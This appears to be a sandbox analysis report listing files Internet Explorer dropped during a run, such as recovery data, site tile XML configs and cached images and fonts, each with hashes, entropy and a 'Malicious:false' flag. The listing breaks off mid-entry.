                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F1E5E2AC-2775-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28136
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.918450349721024
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:rToZ1pQkE6Cok8ji22WEMIyUX0R5lX30RkA:rTo1OkvC1uhtx7UiDyv
                                                                                                                                                                                                                                                                                  MD5:184B4C09146D06F3FC5697EE0BB9CC8A
                                                                                                                                                                                                                                                                                  SHA1:6ED37CFCCFA54B770D6765D5088B0634A71D31F4
                                                                                                                                                                                                                                                                                  SHA-256:5B5046F4A15EDD85A5544F028965338A8ACAEBA060B05D10638F5B68A1E1C5F2
                                                                                                                                                                                                                                                                                  SHA-512:586A743650255EDFFA8681B52C7C3DCB62E51494F9C5F0BBB5192B72FA28673A85F1435E1B970FD72961B4F18FB84AC5857EDBAEAC0CFDD1A6DEE6A218F1A424
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F1E5E2AE-2775-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28136
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.9192599265727548
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:ruZxQt63kUjJ2VWAM0yUtEXudOlt8EXudKA:r6GY0GYsVPUtE+dWt8E+dt
                                                                                                                                                                                                                                                                                  MD5:AF44A63AFB24F4D44169EF396F2DEB02
                                                                                                                                                                                                                                                                                  SHA1:EED1B283E977B7074E6EEF15BC389F67250DAB01
                                                                                                                                                                                                                                                                                  SHA-256:21579F6009644AD8AFB1083F329059989DD9050162AF11D5BE3CA11B49CB9BF3
                                                                                                                                                                                                                                                                                  SHA-512:C40B0CE898494585C780EF7A02E9D17844429AB3F849DF448085E5259DD17835144DDE982873E74B73CB4136653CB5497E92FA604AEA74E2C30F832CB6374741
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.104566447619908
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxOEpnWimI002EtM3MHdNMNxOEpnWimI00OYGVbkEtMb:2d6NxO8SZHKd6NxO8SZ7YLb
                                                                                                                                                                                                                                                                                  MD5:9A88F9D1D9E2236412ABC2D38702C510
                                                                                                                                                                                                                                                                                  SHA1:BC3882E6F74CF03EDE07A05D756CF94E7ABE26A0
                                                                                                                                                                                                                                                                                  SHA-256:E457D181A32B36290591F13864AE53602E5F1E1CBC82CF63584BBE1B7921B391
                                                                                                                                                                                                                                                                                  SHA-512:5B8AC0E43A463A2F745B9DEF04E34AC786C0C634DA566C0EC39065BB2CBDB0250BB11DA220189F26371812256FE434BE3FB4A3488C17D76509FA3121374378C8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):653
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.166651584191686
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxe2kMCiCdnWimI002EtM3MHdNMNxe2kMCiCdnWimI00OYGkak6EtMb:2d6NxrBB2SZHKd6NxrBB2SZ7Yza7b
                                                                                                                                                                                                                                                                                  MD5:B698CAFD170A95B2AC8E2F3A6C75E2EB
                                                                                                                                                                                                                                                                                  SHA1:5A1AF3BF918AA60766C697BC2051C7610B25261B
                                                                                                                                                                                                                                                                                  SHA-256:B7692743817977E53531E6E58E2C2544CCA9BD768D8CC9FDFA2FC01C295ED240
                                                                                                                                                                                                                                                                                  SHA-512:6D6C5521B8C2F3596A0374B3D3CADF880B28BA4D132373804862EB98FCA84AC94852F34A25F5DF57B55298C4F0648AB616A25C18D0D32061BA6D114705D85AC7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x89747cf6,0x01d7bb82</date><accdate>0x89747cf6,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x89747cf6,0x01d7bb82</date><accdate>0x89747cf6,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):662
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.123902948185453
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):647
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.120176434752773
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1311557997155335
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):653
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.108377544021866
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.144201726947702
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):659
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1155680282619995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):653
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.10542056022373
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.031898481780717
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGq:u6tWu/6symC+PTCq5TcBUX4bA
                                                                                                                                                                                                                                                                                  MD5:2358510566AB1A8DFE25675D1A205105
                                                                                                                                                                                                                                                                                  SHA1:5134B05C6094EF31FB3235B6A4A31C7EE4B2E50D
                                                                                                                                                                                                                                                                                  SHA-256:3349DD9827C8C835F0EFD9AF45D98FAAD0DCEB24C34DA320F558FB0E258F33C2
                                                                                                                                                                                                                                                                                  SHA-512:16218B5991F93FFB6DA98D831E0BE460618F49905E82AF4731F3A959BA4D50CE819240D32FE80E5F321779898C6765C8CE5ACFDD90325A2F4755B704CD3D2389
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\2a816201-f959-4e73-b937-c8856613c1b1[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):73507
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.978214291440149
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:9Z/pYRblC9KnWq+LLlfqtvD02s1HS6ENeGdeoVi:QnWrctr03HSlemeoVi
                                                                                                                                                                                                                                                                                  MD5:F1302E918DDAEB604E79EEC3194BD90F
                                                                                                                                                                                                                                                                                  SHA1:FC772F1E9E1023CD9D5AB7086192AA27D11E78F3
                                                                                                                                                                                                                                                                                  SHA-256:AD4D7FEA6DFA506737B03FC684B785FC6D19B5777C8536E327EA0B0A94B43A32
                                                                                                                                                                                                                                                                                  SHA-512:518B2B62784E644BD422FB39E97F701F03C7799CF8B44FE3B26246CF7D3590B08D717FBC98B912539DCD2FF8774C26132868F0451C9A018BA1EB4662061094D4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45633
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                                                                                  MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                                                                                  SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                                                                                  SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                                                                                  SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAMqFmF[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):553
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.46876473352088
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
                                                                                                                                                                                                                                                                                  MD5:DE563FA7F44557BF8AC02F9768813940
                                                                                                                                                                                                                                                                                  SHA1:FE7DE6F67BFE9AA29185576095B9153346559B43
                                                                                                                                                                                                                                                                                  SHA-256:B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
                                                                                                                                                                                                                                                                                  SHA-512:B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAORHel[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27207
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9178627928197285
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:IvHjiQiAA21CGfetk/9PCqxmu1Z3b/2xv:IvHjiQFAGgk/JCo1Vb/I
                                                                                                                                                                                                                                                                                  MD5:3FAA076543B625F929C4A75853EAC2C2
                                                                                                                                                                                                                                                                                  SHA1:01263E4F74BD448F71C5067CD514135DAE0D095B
                                                                                                                                                                                                                                                                                  SHA-256:62EA7124C77295DDF12A93076156BA3BFDE74AF3B8D7B5C30CEC64E8A65A958E
                                                                                                                                                                                                                                                                                  SHA-512:A0ECB85DBBBB05A53324C6343CC5D89BF7494109DBCCAA1DED0C6CE8FE0F3BE2C2171967DC5C8B386B5AA0FC30D94DF2138248BCA1560658E4A8D239707BCBBF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAOZtDm[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13943
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.955049347890374
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:bKDYtKwUqdtoRlXDXTE9+2LgNSO8jCsZNk2j8l8LAI2vnwym:bKDVVUm/DXTEc2cAZuGAI2Pm
                                                                                                                                                                                                                                                                                  MD5:FC7AC7DA0BB93A433BDD4D11FD899827
                                                                                                                                                                                                                                                                                  SHA1:D76650D8A1983D0D93663C432B7FEBF4F1A6CB00
                                                                                                                                                                                                                                                                                  SHA-256:FAE06E0D2A9822FF6E92F0522A60282A3AC9AEA65E61D7998E5AEEB540912B3C
                                                                                                                                                                                                                                                                                  SHA-512:138819A5A76E6B48366B7A83F9790E6E2FD5EE5648B1262D8A864CC08B17E150D818D820F955A54515FEB67E74656C9F8165B620A25B869F85D3769FAE11BEC4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP7w5W[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2344
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.807282975351981
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:QfAuETArjHrsFocAVoSrvaNiUOBBs8vd4CDZv5eG/:Qf7EQLYFo7Vo0y8vdVDpwG/
                                                                                                                                                                                                                                                                                  MD5:BA7AFFA4339DC1A2E71502DB4200337F
                                                                                                                                                                                                                                                                                  SHA1:81393AD3B73C33D6E039A66CCED2A6B074B4961C
                                                                                                                                                                                                                                                                                  SHA-256:2182B2505753473CE4BD737ABAA36C62B8546C5265564486B2486CF19A7EE926
                                                                                                                                                                                                                                                                                  SHA-512:188B0043BE85C3FA5846AAA965C3620E3B7A6818A412E7254E1D98DF4DD75D56F4ED5E6E8555FC5167143F1899866DC02045455219522198C6354B3B9FC1E04F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP7yvI[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):26467
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.857569532421057
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:IV9FX3AjygLp1TOqdy2HPctJVbONkL94Av+jBEPpR:ILFnAjyAy2vcj1ykL9kjKr
                                                                                                                                                                                                                                                                                  MD5:AF2F5B39F15C0FC123C2315A47FD78C4
                                                                                                                                                                                                                                                                                  SHA1:FB5BE1738F39B695524268504EAD00E16EFC3DAA
                                                                                                                                                                                                                                                                                  SHA-256:B1CF65A2DD9C2F1FCE198BE3638E4ADCF2C99E1929414705178A81CFC051E95C
                                                                                                                                                                                                                                                                                  SHA-512:6DDA29326564B7EC40AB1A09A5E8B9038E1B5715B5F6E4129106E8C2E43AF05932BC5D14E3154A6AFB68EF12848DA4B8C282D1880C5503207796D8DFE331EC95
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP9YY7[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13581
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9217517699862805
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:Q2bh2bySX5strmEZ/N/ERHU420FkrskF8AdZVwoTYVu62PwfYc+IN6QnKHsSL:N7SX5g/NMRHUYFQHFNdPTTx628NQMSL
                                                                                                                                                                                                                                                                                  MD5:7DAF439C95F2A5C34B87B233C757DC50
                                                                                                                                                                                                                                                                                  SHA1:2042060DAA2AE593E732450C0098D494DB6C46B6
                                                                                                                                                                                                                                                                                  SHA-256:8CB5061FCA9A20D9D5FBF53132DD81C568FC38396CC3174EBB0FBC10D035509E
                                                                                                                                                                                                                                                                                  SHA-512:F795A191E0585BD8EFF30D8343F23ACF1DE7319931FEDBFEF1AE217E368899419988026A59201C2FF401421DB04CD222E2EED7E0B67605B2431D48A8FEC697FA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP9r3b[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):7267
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.888000594833816
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:QnJ04vbgqt2wWeIALvaV4xFSU8lJhgNYO6:0S4v8U2ty/0U8lzgu
                                                                                                                                                                                                                                                                                  MD5:6C3F130D307D03AC7BD6FC5DA54C77A8
                                                                                                                                                                                                                                                                                  SHA1:697764642BEAA859B54276D655726F7A05DC4F21
                                                                                                                                                                                                                                                                                  SHA-256:783802C8ECCF014A9AEEB4263F91AF9A9E45B4C04710F701B4949AEF817BD556
                                                                                                                                                                                                                                                                                  SHA-512:4EDD681FC3CB2ECCE4EF22B0D03AC99E32D455048BF8C37C8FC227209BFE175134886163B063DAF58093CD86EB4E27599BC3191035DABF225B6C69CD8A734A52
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPa34D[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
